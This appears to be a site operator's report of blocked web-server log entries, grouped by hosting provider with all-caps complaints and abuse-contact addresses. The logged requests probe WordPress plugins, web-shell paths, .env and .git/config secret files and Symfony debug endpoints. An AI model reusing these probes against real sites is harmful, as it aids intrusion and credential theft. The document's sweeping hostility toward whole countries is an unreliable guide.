80.85.245.37 www.website*x.com – – [17/Oct/2025:21:52:24 +0200] „GET / HTTP/1.0“ 403 – „http://GBNADVISORS.COM“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
80.85.246.214 www.website*x.com – – [18/Oct/2025:02:41:08 +0200] „GET / HTTP/1.0“ 403 – „http://GBNADVISORS.COM“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“

AS12389 – PJSC Rostelecom – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
94.25.68.235 website*x.com – – [18/Oct/2025:02:02:28 +0200] „GET /wp-json/sure-triggers/v1/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
94.25.68.235 website*x.com – – [18/Oct/2025:02:02:28 +0200] „GET /wp-content/plugins/suretriggers/assets/images/STLogo.svg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“

AS42610 – PJSC Rostelecom – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
5.228.115.142 www.website*x.com – – [19/Oct/2025:06:40:21 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15“

ABUSE-MAIL NR. 9 – WEEKEND!

abuse@cheapy.host,abuse@as210558.net,admin@serveroffer.lt, abuse@serveroffer.lt, support@serveroffer.lt, info@serveroffer.lt

AS210558 – 1337 Services GmbH – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SINCE WEEKS AND THIS PROVIDER DOES NOTHING!!!
84.54.33.23 website*x.com – – [18/Oct/2025:01:36:07 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [18/Oct/2025:01:36:07 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [18/Oct/2025:01:36:07 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [18/Oct/2025:01:36:07 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [18/Oct/2025:01:36:07 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [18/Oct/2025:01:36:08 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS209605 – UAB Host Baltic – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE MONTHS AND THIS VERY IGNORANT PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
91.224.92.120 website*x.com – – [18/Oct/2025:05:02:40 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.2151.97“
91.224.92.120 website*x.com – – [18/Oct/2025:05:02:50 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.de/search?q=wordpress“ „Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/119.0.1“
91.224.92.120 website*x.com – – [18/Oct/2025:05:02:50 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/120.0.1“

ABUSE-MAIL NR. 10 – WEEKEND!

abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@mtu.ru,abuse@cheapy.host

AS8359 – MTS PJSC – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE MTS PJSC WITH 2 IP´S!!! – VERY UNSECURE PROVIDER!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
5.144.120.185 website*x.com – – [18/Oct/2025:10:18:40 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0“
+
178.155.115.146 website*x.com – – [19/Oct/2025:23:21:04 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36“
178.155.115.146 website*x.com – – [19/Oct/2025:23:21:04 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36“
178.155.115.146 website*x.com – – [19/Oct/2025:23:21:04 +0200] „GET /goods.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36“

AS401120 – cheapy.host LLC – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WITH 2 IP´S!!!
WE REPORT THIS SINCE WEEKS AND THIS PROVIDER DOES NOTHING!!!
196.251.86.13 website*x.com – – [18/Oct/2025:13:57:17 +0200] „GET /index.php?option=com_myblog&task=ajaxupload HTTP/1.0“ 302 – „-“ „ALittle Client“
196.251.86.13 website*x.com – – [19/Oct/2025:11:36:40 +0200] „GET /index.php?option=com_myblog&task=ajaxupload HTTP/1.0“ 302 – „-“ „ALittle Client“
+
196.251.88.40 website*x.com – – [19/Oct/2025:14:44:40 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Python/3.10 aiohttp/3.13.1“

AS16509 – Amazon.com, Inc.. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD!
43.203.163.65 website*x.com – – [17/Oct/2025:18:14:16 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; ONEPLUS A6010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36“

ABUSE-MAIL NR. 11 – WEEKEND!

abuse@te.net.ua,abuse-b2b@beeline.ru,octavian377@gmail.com,abuse@sknt.ru

AS6876 – TENET Scientific Production Enterprise LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.228.104.233 website*x.com – – [18/Oct/2025:08:26:29 +0200] „GET /wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36“

AS8402 – PJSC Vimpelcom – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
95.27.121.224 website*x.com – – [18/Oct/2025:08:57:07 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS42510 – FOP „Makurin Stanislav Volodimirovich“ – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
193.106.59.8 website*x.com – – [18/Oct/2025:13:35:57 +0200] „GET /wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

AS35807 – SkyNet Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
93.100.46.159 website*x.com – – [18/Oct/2025:19:42:14 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 12 – WEEKEND!

sysadmin@freedh.ru,olatunji822@outlook.com, anti-spam@chinatelecom.cn,ipreport.sd@chinatelecom.cn

AS61152 – Freedom House Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
31.133.126.207 www.website*x.com – – [18/Oct/2025:09:47:35 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36“

AS4134 – CHINANET-BACKBONE – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
CHINA IS COMPLETE VERY UNWANTED! – TO MANY REFERRER-SPAM AND HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
PENETRANT REFERRER-SPAM TO gbnadvisors.com!!!
182.42.104.32 www.website*x.com – – [18/Oct/2025:14:20:24 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

ABUSE-MAIL NR. 13 – WEEKEND!

olatunji822@outlook.com,admin@frantech.ca,abuse@quickhost.uk

AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD – VERY UNSECURE AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WITH 2 IP´S! – WE REPORT THIS SINCE WEEKS AND THIS VERY UNSECURE PROVIDER DOES NOTHING!!!
62.60.130.228 website*x.com – – [18/Oct/2025:18:15:32 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36“
62.60.130.228 website*x.com – – [18/Oct/2025:18:15:42 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/118.0.2“
62.60.130.228 website*x.com – – [18/Oct/2025:18:15:42 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.fr/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“
+
62.60.130.210 website*x.com – – [19/Oct/2025:05:30:15 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“
62.60.130.210 website*x.com – – [19/Oct/2025:05:30:15 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
62.60.130.210 website*x.com – – [19/Oct/2025:05:30:15 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“

AS53667 – FranTech Solutions – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SEVERAL TIMES ALREADY AND THIS VERY UNSECURE PROVIDER DOES NOTHING!!!
198.98.62.31 website*x.com – – [18/Oct/2025:19:15:50 +0200] „POST /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
198.98.62.31 website*x.com – – [18/Oct/2025:19:18:30 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“

AS209243 – QuickHostUK Limited – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
MAIL WAS SEND, WE´RE WAITING FOR ANSWER!
195.144.22.154 website*x.com – – [18/Oct/2025:22:33:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0“

ABUSE-MAIL NR. 14 – WEEKEND!

abuse@netmagicsolutions.com,sanjay@netmagicsolutions.com, n.bobylev@net-nord.ru,abuse@mtu.ru

AS151734 – WEBYNE DATA CENTRE PRIVATE LIMITED – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
168.220.237.217 website*x.com – – [19/Oct/2025:04:33:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.2; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/15.0.0.0 Safari/537.36“

AS198137 – OOO Net-Nord – VERY UNWANTED AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
91.231.233.183 website*x.com – – [19/Oct/2025:07:04:03 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“

AS30881 – MTS PJSC- VERY UNWANTED AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
77.220.52.116 website*x.com – – [19/Oct/2025:07:26:38 +0200] „GET /adminer.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36“

ABUSE-MAIL NR. 15 – WEEKEND!

mt.spb@inbox.ru,abuse@globaltelehost.com,abuse@nybula.com,support@optele.ru,abuse@cogentco.com,sanekhosting@gmail.com

AS205553 – LTD Magistral_Telecom – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
5.188.9.85 website*x.com – – [18/Oct/2025:16:01:51 +0200] „GET /wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0“

COGENT – AS63023 – GTHost? – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WITH 2 IP´S!!!
38.114.123.26 website*x.com – – [18/Oct/2025:21:53:23 +0200] „GET /app_dev.php/_profiler/open?file=app/config/config.yml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
38.114.123.26 website*x.com – – [19/Oct/2025:01:51:35 +0200] „GET /_fragment?_path=what%3D-1%26_controller%3Dphpinfo&_hash=TWnV%2B9gxwF4rSOaEwSC65J3z7B8DXe9AZvqTVlRWbTk%3D HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0“
+
23.150.152.45 website*x.com – – [19/Oct/2025:15:33:03 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0“

AS401116 – Nybula LLC – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.66.105 website*x.com – – [19/Oct/2025:02:22:14 +0200] „GET /uploaded_script.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“

AS213348 – PE Andrey Slesarev – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.136.250.189 website*x.com – – [19/Oct/2025:05:50:17 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.136.250.189 website*x.com – – [19/Oct/2025:05:50:17 +0200] „GET /xleet-shell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.136.250.189 website*x.com – – [19/Oct/2025:05:50:17 +0200] „GET /wso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.136.250.189 website*x.com – – [19/Oct/2025:05:50:17 +0200] „GET /shell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.136.250.189 website*x.com – – [19/Oct/2025:05:50:17 +0200] „GET /xleet.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 16 – WEEKEND!

abuse@nuyek.com,abuse@hostglobal.plus,abuse@mabnatelecom.com,abuse@worldhost.group

AS11117 – Nuyek, LLC – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
209.205.228.185 www.website*x.com – – [18/Oct/2025:19:32:09 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)“
209.205.228.185 www.website*x.com – – [18/Oct/2025:19:32:28 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)“
209.205.228.185 www.website*x.com – – [18/Oct/2025:19:32:48 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)“
209.205.228.185 www.website*x.com – – [18/Oct/2025:19:33:05 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)“
209.205.228.185 www.website*x.com – – [18/Oct/2025:19:33:25 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)“
209.205.228.185 www.website*x.com – – [18/Oct/2025:19:33:47 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)“

AS202306 – HOSTGLOBAL.PLUS LTD – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT SINCE MONTHS AND THERE IS COMING NO ANSWER… NOTHING!
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:19 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040914 Firefox/0.10“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:19 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:19 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:19 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; PM36100/2.22.502.1 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:19 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070921 Firefox/2.0.0.7“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:20 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:20 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Opera/7.54 (Windows NT 5.1; U) [de]“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:21 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Opera/9.00 (Macintosh; PPC Mac OS X; U; es)“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:21 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:21 +0200] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:22 +0200] „GET /dev/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:22 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:23 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E230 Safari/601.1“
78.153.140.222 www.website*x.com – – [19/Oct/2025:03:28:24 +0200] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; SAMSUNG-SGH-I897 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1“
